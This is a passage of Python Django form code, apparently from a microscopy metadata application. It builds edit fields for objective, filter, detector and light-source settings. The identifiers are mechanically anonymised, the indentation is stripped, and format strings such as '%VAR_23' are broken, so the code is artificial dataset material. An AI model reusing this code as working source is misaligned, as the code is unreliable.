if VAR_12["initial"]["objective"].lensNA is not None:
self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "lensNA"
),
}
),
initial=VAR_12["initial"]["objective"].lensNA,
label="Lens NA",
required=False,
)
else:
self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "lensNA"
),
}
),
required=False,
)
FUNC_1(self.fields["lensNA"])
except Exception:
self.fields["lensNA"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lens NA",
required=False,
)
FUNC_1(self.fields["lensNA"])
try:
if VAR_12["initial"]["objective"].getImmersion() is not None:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"immersion",
VAR_7=True,
)
}
),
initial=VAR_12["initial"]["objective"].getImmersion().value,
required=False,
)
else:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"immersion",
VAR_7=True,
)
}
),
required=False,
)
FUNC_1(self.fields["immersion"])
except Exception:
self.fields["immersion"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["immersion"])
try:
if VAR_12["initial"]["objective"].getCorrection() is not None:
self.fields["correction"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"correction",
VAR_7=True,
)
}
),
initial=VAR_12["initial"]["objective"].getCorrection().value,
required=False,
)
else:
self.fields["correction"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"correction",
VAR_7=True,
)
}
),
required=False,
)
FUNC_1(self.fields["correction"])
except Exception:
self.fields["correction"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["correction"])
try:
if VAR_12["initial"]["objective"].workingDistance is not None:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "workingDistance"
),
}
),
initial=VAR_12["initial"]["objective"].workingDistance.getValue(),
label=(
"Working distance (%VAR_23)"
% VAR_12["initial"]["objective"].workingDistance.getSymbol()
),
required=False,
)
else:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "workingDistance"
),
}
),
label="Working distance",
required=False,
)
FUNC_1(self.fields["workingDistance"])
except Exception:
self.fields["workingDistance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Working distance",
required=False,
)
FUNC_1(self.fields["workingDistance"])
try:
if VAR_12["initial"]["objective"].getIris() is not None:
self.fields["iris"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "iris", VAR_7=True
)
}
),
initial=VAR_12["initial"]["objective"].getIris().value,
required=False,
)
else:
self.fields["iris"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "iris", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["iris"])
except Exception:
self.fields["iris"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["iris"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
]
class CLASS_17(CLASS_16):
VAR_24 = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_17, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["objectiveSettings"].correctionCollar is not None:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
initial=VAR_12["initial"]["objectiveSettings"].correctionCollar,
label="Correction collar",
required=False,
)
else:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
label="Correction collar",
required=False,
)
FUNC_1(self.fields["correctionCollar"])
except Exception:
self.fields["correctionCollar"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Correction collar",
required=False,
)
FUNC_1(self.fields["correctionCollar"])
try:
if VAR_12["initial"]["objectiveSettings"].getMedium() is not None:
self.fields["medium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"medium",
VAR_7=True,
)
}
),
initial=VAR_12["initial"]["objectiveSettings"].getMedium().value,
required=False,
)
else:
self.fields["medium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"medium",
VAR_7=True,
)
}
),
required=False,
)
FUNC_1(self.fields["medium"])
except Exception:
self.fields["medium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["medium"])
try:
if VAR_12["initial"]["objectiveSettings"].refractiveIndex is not None:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
initial=VAR_12["initial"]["objectiveSettings"].refractiveIndex,
label="Refractive index",
required=False,
)
else:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
label="Refractive index",
required=False,
)
FUNC_1(self.fields["refractiveIndex"])
except Exception:
self.fields["refractiveIndex"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Refractive index",
required=False,
)
FUNC_1(self.fields["refractiveIndex"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
"correctionCollar",
"medium",
"refractiveIndex",
]
class CLASS_18(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_18, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["filter"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["filter"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["filter"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "model"
),
}
),
initial=VAR_12["initial"]["filter"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["filter"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "serialNumber"
),
}
),
initial=VAR_12["initial"]["filter"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["filter"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "lotNumber"
),
}
),
initial=VAR_12["initial"]["filter"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_12["initial"]["filter"].filterWheel is not None:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "filterWheel"
),
}
),
initial=VAR_12["initial"]["filter"].filterWheel,
label="Filter wheel",
required=False,
)
else:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "filterWheel"
),
}
),
label="Filter wheel",
required=False,
)
FUNC_1(self.fields["filterWheel"])
except Exception:
self.fields["filterWheel"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Filter wheel",
required=False,
)
FUNC_1(self.fields["filterWheel"])
try:
if VAR_12["initial"]["filter"].getFilterType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "type", VAR_7=True
)
}
),
initial=VAR_12["initial"]["filter"].getFilterType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "type", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["type"])
VAR_38 = VAR_12["initial"]["filter"].getTransmittanceRange()
try:
if VAR_38 is not None and VAR_38.cutIn is not None:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutIn"
),
}
),
initial=VAR_12["initial"]["filter"]
.getTransmittanceRange()
.cutIn.getValue(),
label="Cut in (%VAR_23)" % VAR_38.cutIn.getSymbol(),
required=False,
)
else:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutIn"
),
}
),
label="Cut in",
required=False,
)
FUNC_1(self.fields["cutIn"])
except Exception:
self.fields["cutIn"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in",
required=False,
)
FUNC_1(self.fields["cutIn"])
try:
if VAR_38 is not None and VAR_38.cutOut is not None:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
initial=VAR_38.cutOut.getValue(),
label="Cut out (%VAR_23)" % VAR_38.cutOut.getSymbol(),
required=False,
)
else:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out",
required=False,
)
FUNC_1(self.fields["cutOut"])
except Exception:
self.fields["cutOut"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out",
required=False,
)
FUNC_1(self.fields["cutOut"])
try:
if VAR_38 is not None and VAR_38.cutInTolerance is not None:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutInTolerance"
),
}
),
initial=VAR_38.cutInTolerance.getValue(),
label=("Cut in tolerance (%VAR_23)" % VAR_38.cutInTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutInTolerance"
),
}
),
label="Cut in tolerance",
required=False,
)
FUNC_1(self.fields["cutInTolerance"])
except Exception:
self.fields["cutInTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in tolerance",
required=False,
)
FUNC_1(self.fields["cutInTolerance"])
try:
if VAR_38 is not None and VAR_38.cutOutTolerance is not None:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
initial=VAR_38.cutOutTolerance.getValue(),
label=("Cut out tolerance (%VAR_23)" % VAR_38.cutOutTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out tolerance",
required=False,
)
FUNC_1(self.fields["cutOutTolerance"])
except Exception:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out tolerance",
required=False,
)
FUNC_1(self.fields["cutOutTolerance"])
try:
if VAR_12["initial"]["filter"].transmittanceRange is not None:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "transmittance"
),
}
),
initial=formatPercentFraction(
VAR_12["initial"]["filter"]
.getTransmittanceRange()
.transmittance
),
label="Transmittance (%)",
required=False,
)
else:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "transmittance"
),
}
),
required=False,
)
FUNC_1(self.fields["transmittance"])
except Exception:
self.fields["transmittance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["transmittance"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"filterWheel",
"cutIn",
"cutOut",
"cutInTolerance",
"cutOutTolerance",
"transmittance",
]
class CLASS_19(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_19, self).__init__(*VAR_11, **VAR_12)
VAR_39 = VAR_12["initial"]["detectorSettings"]
VAR_40 = VAR_12["initial"]["detector"]
try:
if VAR_40 is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "manufacturer"),
}
),
initial=VAR_40.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "manufacturer"),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_40 is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "model"),
}
),
initial=VAR_40.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_40 is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "serialNumber"),
}
),
initial=VAR_40.serialNumber,
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "serialNumber"),
}
),
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_40 is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "lotNumber"),
}
),
initial=VAR_40.lotNumber,
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "lotNumber"),
}
),
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_40.getDetectorType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
}
),
initial=VAR_40.getDetectorType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
}
),
required=False,
)
FUNC_1(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["type"])
try:
if VAR_39 is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
),
initial=VAR_39.gain,
required=False,
)
elif VAR_40 is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "gain"),
}
),
initial=VAR_40.gain,
required=False,
)
else:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
),
required=False,
)
FUNC_1(self.fields["gain"])
except Exception:
self.fields["gain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["gain"])
try:
if VAR_39 is not None and VAR_39.voltage is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "voltage"),
}
),
initial=VAR_39.voltage.getValue(),
label="Voltage (%VAR_23)" % VAR_39.voltage.getSymbol(),
required=False,
)
elif VAR_40 is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
initial=VAR_40.voltage.getValue(),
label="Voltage (%VAR_23)" % VAR_40.voltage.getSymbol(),
required=False,
)
else:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "voltage"),
}
),
required=False,
)
FUNC_1(self.fields["voltage"])
except Exception:
self.fields["voltage"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["voltage"])
try:
if VAR_39 is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "offsetValue"),
}
),
initial=VAR_39.offsetValue,
label="Offset",
required=False,
)
elif VAR_40 is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "offsetValue"),
}
),
initial=VAR_40.offsetValue,
label="Offset",
required=False,
)
else:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "offsetValue"),
}
),
label="Offset",
required=False,
)
FUNC_1(self.fields["offsetValue"])
except Exception:
self.fields["offsetValue"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Offset",
required=False,
)
FUNC_1(self.fields["offsetValue"])
try:
if VAR_40 is not None:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
initial=VAR_40.zoom,
required=False,
)
else:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
required=False,
)
FUNC_1(self.fields["zoom"])
except Exception:
self.fields["zoom"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["zoom"])
try:
if VAR_40 is not None:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "amplificationGain"),
}
),
initial=VAR_40.amplificationGain,
label="Amplification gain",
required=False,
)
else:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "amplificationGain"),
}
),
label="Amplification gain",
required=False,
)
FUNC_1(self.fields["amplificationGain"])
except Exception:
self.fields["amplificationGain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Amplification gain",
required=False,
)
FUNC_1(self.fields["amplificationGain"])
try:
if VAR_39 is not None and VAR_39.readOutRate is not None:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "readOutRate"),
}
),
initial=VAR_39.readOutRate.getValue(),
label=("Read out rate (%VAR_23)" % VAR_39.readOutRate.getSymbol()),
required=False,
)
else:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "readOutRate"),
}
),
label="Read out rate",
required=False,
)
FUNC_1(self.fields["readOutRate"])
except Exception:
self.fields["readOutRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Read out rate",
required=False,
)
FUNC_1(self.fields["readOutRate"])
try:
if VAR_39 is not None:
self.fields["binning"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_39.id, "type", VAR_7=True)
}
),
initial=VAR_39.getBinning().value,
required=False,
)
else:
self.fields["binning"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_39.id, "type", VAR_7=True)
}
),
required=False,
)
FUNC_1(self.fields["binning"])
except Exception:
self.fields["binning"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["binning"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"gain",
"voltage",
"offsetValue",
"zoom",
"amplificationGain",
"readOutRate",
"binning",
]
class CLASS_20(forms.Form):
VAR_24 = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_20, self).__init__(*VAR_11, **VAR_12)
VAR_41 = VAR_12["initial"]["lightSource"]
VAR_42 = None
if "lightSourceSettings" in VAR_12["initial"]:
VAR_42 = VAR_12["initial"]["lightSourceSettings"]
self.lightSourceType = VAR_41.OMERO_CLASS
try:
if VAR_41.manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
initial=VAR_41.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_41.model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
initial=VAR_41.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_41.serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "serialNumber"),
}
),
initial=VAR_41.serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "serialNumber"),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_41.lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "lotNumber"),
}
),
initial=VAR_41.lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "lotNumber"),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_41.power is not None:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "power"),
}
),
initial=VAR_41.power.getValue(),
label="Power (%VAR_23)" % VAR_41.power.getSymbol(),
required=False,
)
else:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "power"),
}
),
required=False,
)
FUNC_1(self.fields["power"])
except Exception:
self.fields["power"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["power"])
try:
